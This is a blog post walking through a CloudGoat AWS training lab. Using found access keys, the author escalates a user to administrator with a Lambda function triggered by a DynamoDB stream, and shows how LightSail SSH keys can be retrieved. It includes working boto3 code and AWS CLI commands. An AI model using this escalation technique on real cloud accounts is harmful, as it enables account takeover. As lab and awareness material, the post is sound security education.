Playing with CloudGoat part 3: using AWS Lambda for privilege escalation and exploring a LightSail service

In this blog post, I’ll go through a scenario when an attacker finds Joe’s and Bob’s access keys but the EC2 instance is terminated. If you’re new to this series and you haven’t faintest idea what is CloudGoat and who the hell is Joe and Bob, then I recommend you to read the first part of the series.

Having access keys, the first step an attacker would do is verifying what the owner is allowed to do. Unfortunately, Joe is missing iam:ListAttachedUserPolicies and iam:GetUserPolicy permissions but fortunately we can use Bob’s permissions.

Oooh so Joe’s permissions are regulated by the AWS managed policy named DatabaseAdministrator. Being able to create a Lambda function would open a new door in this scenario by giving me new possibilities, but firstly I have to know what role should be assigned to it (without a role a new Lambda wouldn’t be able to perform any action — makes sense, doesn’t it?). Let’s see then what roles are available to assign, using the following command:

$ aws iam list-roles --profile joe

From the output, you can read that there are actually 2 roles which can be assigned to Lambda function: “iam_for_lambda” and “lambda-dynamodb-cloudgoat”. The first one, uses the policy named “policy_for_lambda_role” which could be helpful to fool CloudTrail service (for more details see the part 2 of this series). So, what about the second role — the “lambda-dynamodb-cloudgoat”?

Nice! Having the iam:AttachRolePolicy permission I can use the Lambda service to escalate privileges to Administrator 😎 Such “evil” function may look as simple as that:

import boto3

def lambda_handler(event, context):
iam = boto3.client("iam")
iam.attach_role_policy(RoleName="lambda-dynamodb-cloudgoat",
PolicyArn="arn:aws:iam::aws:policy/AdministratorAccess",)
iam.attach_user_policy(UserName="joe",
PolicyArn="arn:aws:iam::aws:policy/AdministratorAccess",)

Now, it’s time for zipping the code and I’m ready to create a new Lambda function:

The last step to do is to simply invoke the function and go celebrating, but… ehhh… that would be too simple. DatabaseAdministrator policy allows for creating new Lambda functions but unfortunately… not to invoke them 😢

But a good news is that you can also call Lambda by invoking an event*.

* — I’ll let myself to do a little digression here as this is quite new attack vector applicable to all serverless functions: an event injection. Basically Lambda functions are often processing events so if you can malform the event (e.g. the name of the uploaded S3 object) and it isn’t properly validated, then you can force Lambda to execute your code. I don’t want to go into details of that now as this is not applicable in CloudGoat scenarios, but if you’re new to this type of attack I recommend you to check out this short presentation, take a look on this simple example of SQLi using uploaded filename or just watch this more “real-world” example.

Ok, back to our scenario. Here is the list of all Lambda supported event sources. Analyzing Joe’s permissions it seams that there’s a chance to connect a new Lambda function with DynamoDB table — in other words, I can configure a new Lambda function which will be invoked once a new entry in a new DynamoDB table appear. It may sound weird, but take a look on the example. Let’s try to create a simple test stream table named “rzepsky_table” using the following command:

$ aws dynamodb create-table --table-name rzepsky_table --attribute-definitions AttributeName=Test,AttributeType=S --key-schema AttributeName=Test,KeyType=HASH --provisioned-throughput ReadCapacityUnits=3,WriteCapacityUnits=3 --stream-specification StreamEnabled=true,StreamViewType=NEW_IMAGE --query TableDescription.LatestStreamArn --profile joe

In short, the above-mentioned command creates a new table with just one column Test for storing strings (S). In--key-schema I specified the primary key for the table (Test). Then I set the provisioned throughput using the parameter provisioned-throughput and enabled DynamoDB Stream. And… surprise, surprise… it worked 🤓

Once I’ve created a source of events, it’s time to connect the created DynamoDB table with the new Lambda:

Uff… and it also worked! Finally, let’s put a new entry in the table to trigger the Lambda function using the following command:

$ aws dynamodb put-item --table-name rzepsky_table --item Test='{S=”Rzepsky”}' --profile joe

If everything went well this event should have invoked Lambda, what would attach Administrator policy to user Joe. So let’s verify policies attached to user Joe:

Hell yeah! The user Joe became an administrator what actually means: now he can perform any action💪

AWS LightSail

The LightSail service offers cloud compute, storage and networking for cloud users. In other words you can quickly get a variety of operating systems, applications and stacks so you can build a template. The goal of LightSail is to provide a user a simplified version of EC2, so you don’t have to navigate through EBS, VPC, and Route 53 specifics — you just get a simple, lightweight VPS. But… does this simplicity comes with less security? Well… let’s check it!

In EC2 instance there’s no way to download SSH key to get instance’s shell. However, in LightSail the situation looks differently. First of all, the LightSail’s users can use “default key”, which can be retrieved using the following command:

$ aws lightsail download-default-key-pair

Let’s see what keys are used in CloudGoat’s LightSail project:

$ aws lightsail get-instance-access-details --instance-name cloudgoat_ls --profile joe

From the output you can read that the LightSail instance uses “cloudgoat_key_pair”:

However, that’s no problem in LightSail, as you can simply ask for temporary ssh keys using the following command:

$ aws lightsail get-instance-access-details --instance-name cloudgoat_ls --profile joe

What is more, if you have the console management access (which isn’t any challenge if I escalated joe’s privileges to administrator), you can even access the shell from your browser! Just click the little icon of the terminal:

Ending words

In this episode you saw that using an Amazon-provided DatabaseAdministrator policy it was possible to escalate privileges if too permissive role can be assigned to Lambda. Management of IAM permissions is not an easy task, especially if you have complex architecture and many users. A quite interesting tool which may help you with removing unnecessary permissions is the Netflix Repokid.

In the second part of this post we explored some “features” of the LightSail service. Don’t get me wrong — I DON’T claim the service is insecure, because you still need proper permissions to access it. Just be aware of such “features” when assigning wildcards in permission policies 😉

Let me know what do you think about it! In the next episode I’ll go through another CloudGoat’s scenarios, sooo: